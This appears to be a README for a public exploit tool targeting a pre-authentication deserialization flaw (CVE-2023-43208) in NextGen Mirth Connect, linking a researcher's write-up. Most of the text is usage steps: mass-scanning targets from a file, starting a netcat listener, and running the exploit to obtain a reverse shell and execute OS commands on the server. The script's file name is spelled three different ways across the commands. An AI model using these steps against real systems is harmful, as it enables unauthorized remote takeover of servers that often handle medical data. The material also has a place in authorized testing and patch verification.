A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application.
clone this repository
cd NextGen-Mirth-Connect-Exploit
pip3 install -r requirements.txt
# Check if a target is vulnerable
python3 mirth_connect_exploit.py -t IP -p port
# Check a list of targets in a file
python3 mirth_connect_exploit -f FILE
# Exploit a target to get a reverse shell
nc -lvnp port (to start a listener)
python3 mirthconnect_exploit.py -t IP -p port -lh localhost -lp localport --exploit
https://www.horizon3.ai/attack-research/attack-blogs/writeup-for-cve-2023-43208-nextgen-mirth-connect-pre-auth-rce/